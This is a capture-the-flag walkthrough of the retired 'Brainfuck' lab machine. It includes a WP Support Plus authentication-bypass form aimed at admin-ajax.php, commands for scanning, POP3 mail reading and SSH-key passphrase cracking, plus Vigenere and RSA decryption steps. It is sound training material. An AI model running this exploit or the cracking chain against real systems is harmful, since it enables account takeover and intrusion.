Today we’re going to solve another CTF machine, “Brainfuck”. It is now a retired box and can be accessed if you’re a VIP member.

Introduction

Specifications

  • Target OS: Linux
  • Services: SSH, SMTP, POP3, IMAP, SSL
  • IP Address: 10.10.10.17
  • Difficulty: Hard

Weakness

  • Exploitation
  • RSA Decryption

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step is the reconnaissance phase, starting with port scanning.

Ports Scanning

During this step we’re gonna identify the target and see what services are running behind the IP address.

From the above screenshot we can observe many open ports, and the SSL certificate on port 443 lists the subdomains DNS:www.brainfuck.htb and DNS:sup3rs3cr3t.brainfuck.htb.

Let’s point these domains to the IP address in /etc/hosts.

Now let’s access these domains and see what we can find.

https://brainfuck.htb/

https://sup3rs3cr3t.brainfuck.htb/

So we have two different CMSs installed; let’s enumerate both.

Enumerate WordPress

We have WordPress installed at https://brainfuck.htb, and if you take a look at the first post there is an email address which we have to keep in mind, because brainfuck has the SMTP and POP3 ports open, so this might come in handy.

[email protected]

Let’s run wpscan to see if we can find something interesting.

wpscan --url https://brainfuck.htb --disable-tls-checks

wpscan found two users, “admin” and “administrator”, and one installed plugin which has a known exploit.

searchsploit WP Support Plus

Exploitation

In our case we’re gonna test “WP Support Plus Responsive Ticket System 7.1.3 – Privilege Escalation”.

We have to modify the POST request from the exploit in order to make it work against our target.

<form method="post" action="http://wp/wp-admin/admin-ajax.php">
        Username: <input type="text" name="username" value="administrator">
        <input type="hidden" name="email" value="sth">
        <input type="hidden" name="action" value="loginGuestFacebook">
        <input type="submit" value="Login">
</form>

We know the email, which we found in one of the articles.

<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
        Username: <input type="text" name="username" value="admin">
        <input type="hidden" name="email" value="[email protected]">
        <input type="hidden" name="action" value="loginGuestFacebook">
        <input type="submit" value="Login">
</form>

We changed the username to admin, the email to [email protected] and the action URL to https://brainfuck.htb.

Now, to send the POST request, we create an index.html containing the modified exploit and serve it with Python’s HTTP server.

python -m SimpleHTTPServer 80

After clicking Login, a blank white page comes up.

Now simply remove /wp-admin/admin-ajax.php from the URL and go back to https://brainfuck.htb; you will see the admin toolbar.

Getting a reverse shell through WordPress is usually easy, but we don’t have write access :/ so we have another challenge waiting for us before we get a shell.

After searching around I found another plugin installed which wpscan didn’t detect (I don’t know why), so let’s take a look at it.

This is the information we found in the SMTP plugin settings.

If we inspect the SMTP Password field we can see the password “kHGuERB29DNiNE”.

Since we found an SMTP password we can try connecting to the POP3 port with:

telnet 10.10.10.17 110

We were able to establish a connection.

User: orestis Password: kHGuERB29DNiNE

After logging in successfully we can use the list command to display messages.

list
+OK 2 messages:
1 977
2 514

We can read them using the retr command.

retr 1
+OK 977 octets
Return-Path: <[email protected]>
X-Original-To: [email protected]
Delivered-To: [email protected]
Received: by brainfuck (Postfix, from userid 33)
        id 7150023B32; Mon, 17 Apr 2017 20:15:40 +0300 (EEST)
To: [email protected]
Subject: New WordPress Site
X-PHP-Originating-Script: 33:class-phpmailer.php
Date: Mon, 17 Apr 2017 17:15:40 +0000
From: WordPress <[email protected]>
Message-ID: <[email protected]>
X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8

Your new WordPress site has been successfully set up at:

https://brainfuck.htb

You can log in to the administrator account with the following information:

Username: admin
Password: The password you chose during the install.
Log in here: https://brainfuck.htb/wp-login.php

We hope you enjoy your new site. Thanks!

--The WordPress Team
https://wordpress.org/

To read the second message:

retr 2
+OK 514 octets
Return-Path: <[email protected]>
X-Original-To: orestis
Delivered-To: [email protected]
Received: by brainfuck (Postfix, from userid 0)
        id 4227420AEB; Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
To: [email protected]
Subject: Forum Access Details
Message-Id: <[email protected]>
Date: Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
From: [email protected] (root)

Hi there, your credentials for our "secret" forum are below :)

username: orestis
password: kIEnnfEKJ#9UmdO

Regards

If you take a look, we found something interesting:

username: orestis password: kIEnnfEKJ#9UmdO

If you read the second message, it says these are the credentials for the “secret” forum 🙂 so let’s try logging in.

Let’s take a look at the ‘Key’ thread first.

Now take a look at the ‘SSH Access’ thread.

The ‘Key’ thread is encrypted somehow. If you take a look at the conversation between admin and orestis inside the ‘SSH Access’ thread, orestis is asking admin for the SSH key which he lost. After that orestis created another thread named ‘Key’, and there both admin and orestis talked about something which is not possible to understand.

It’s some kind of encryption which we don’t know yet. Since we don’t have any clue how to decrypt the text, let’s copy the text of both threads and place them one under the other to take a closer look.

We took the replies posted by orestis in both threads.

- Cipher Text 

Mya qutf de buj otv rms dy srd vkdof :)

Pieagnm - Jkoijeg nbw zwx mle grwsnn

- Plain Text

Go fuck yourself admin, I am locked out!! send me my key asap!

Orestis - Hacking for fun and profit

If you look closer at the signature lines:

- Cipher Text 

Pieagnm - Jkoijeg nbw zwx mle grwsnn

- Plain Text

Orestis - Hacking for fun and profit

We have to feed the cipher text in as the encrypted information and the plain text as the decryption key; decrypting that way gives us the key stream that was used.

Tool: http://rumkin.com/tools/cipher/vigenere.php

This is the output which we got!

Brainfu - Ckmybra inf uck myb rainfu

Let’s remove spaces and read it again 😉

BrainfuCkmybrainfuckmybrainfu

This is the deciphered text we got.

And if you remember, there’s an encrypted URL in the ‘SSH Access’ thread but no decryption key there, so we have to find another way to decrypt it.

Since the text we recovered keeps repeating the phrase ‘fuckmybrain’, we can assume it is the key for the other encrypted text as well.

And we got an actual URL for id_rsa key 🙂
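The key-recovery trick done above with the rumkin tool, as an added example (not code from the original write-up): subtracting the known plaintext from the ciphertext gives the key stream, its shortest repeating unit is the key (a rotation of ‘fuckmybrain’ here, since the signature sits partway through the message), and the same key then decrypts the rest. The signature pair is the one quoted in the post; everything else is constructed.

```python
# Added example: Vigenere key recovery from a known plaintext/ciphertext pair.
import string

ALPHA = string.ascii_lowercase


def recover_keystream(ciphertext: str, plaintext: str) -> str:
    """Vigenere is c = (p + k) mod 26, so k = (c - p) mod 26 per letter.
    Non-letters are skipped on both sides; case follows the ciphertext,
    which is how the rumkin tool printed it."""
    c_letters = [ch for ch in ciphertext if ch.isalpha()]
    p_letters = [ch for ch in plaintext if ch.isalpha()]
    if len(c_letters) != len(p_letters):
        raise ValueError("letter counts differ, pair is not aligned")
    out = []
    for c, p in zip(c_letters, p_letters):
        k = (ALPHA.index(c.lower()) - ALPHA.index(p.lower())) % 26
        out.append(ALPHA[k].upper() if c.isupper() else ALPHA[k])
    return "".join(out)


def shortest_period(stream: str) -> str:
    """Smallest unit whose repetition reproduces the key stream."""
    s = stream.lower()
    for n in range(1, len(s) + 1):
        if all(s[i] == s[i % n] for i in range(len(s))):
            return s[:n]
    return s


def vigenere_decrypt(ciphertext: str, key: str) -> str:
    """Decrypt with a repeating key; non-letters pass through and do
    not consume a key letter, case is preserved."""
    key, out, j = key.lower(), [], 0
    for ch in ciphertext:
        if not ch.isalpha():
            out.append(ch)
            continue
        p = (ALPHA.index(ch.lower()) - ALPHA.index(key[j % len(key)])) % 26
        out.append(ALPHA[p].upper() if ch.isupper() else ALPHA[p])
        j += 1
    return "".join(out)


# The signature pair quoted in the write-up.
CIPHER_SIG = "Pieagnm - Jkoijeg nbw zwx mle grwsnn"
PLAIN_SIG = "Orestis - Hacking for fun and profit"

if __name__ == "__main__":
    stream = recover_keystream(CIPHER_SIG, PLAIN_SIG)
    print(stream, shortest_period(stream))
    print(vigenere_decrypt(CIPHER_SIG, shortest_period(stream)))
```

Because the recovered unit is a rotation of the real key, decrypting a different message with it only works if that message starts at the same key offset; otherwise try the eleven rotations.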

We downloaded the key, but upon opening it we found that it is protected by a passphrase.

There’s a tool called John the Ripper which we’ll use to crack the password. We cannot crack the id_rsa key directly; we first have to convert it into John’s hash format.

A bit of research turns up a tool for exactly this: sshng2john.py

python sshng2john.py id_rsa > ssh_key

Now we’re ready to crack the password.

john ssh_key --wordlist=/usr/share/wordlists/rockyou.txt

And after a few seconds we got the password: 3poulakia!

Let’s try to log in over SSH using the key and the password.

ssh -i id_rsa [email protected]

Privilege Escalation

Now that we have found the user.txt flag we’re going after root.txt. Apart from user.txt we found three other unusual files inside /home/orestis/: debug.txt, encrypt.sage and output.txt.

Since we didn’t know what to make of those files, I turned to Google for answers and found some RSA decryption resources.

http://dann.com.br/alexctf2k17-crypto150-what_is_this_encryption/

https://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e/19530#19530

It appears that output.txt contains the encrypted root flag and debug.txt contains the P, Q and E values used for the encryption. Since the primes are known, n = P·Q and φ(n) = (P−1)(Q−1) can be computed directly, which gives the private exponent d = E⁻¹ mod φ(n) without any factoring. By using the above tool it is possible to decrypt the ciphertext and get the root flag.

After running the script we found our root.txt flag.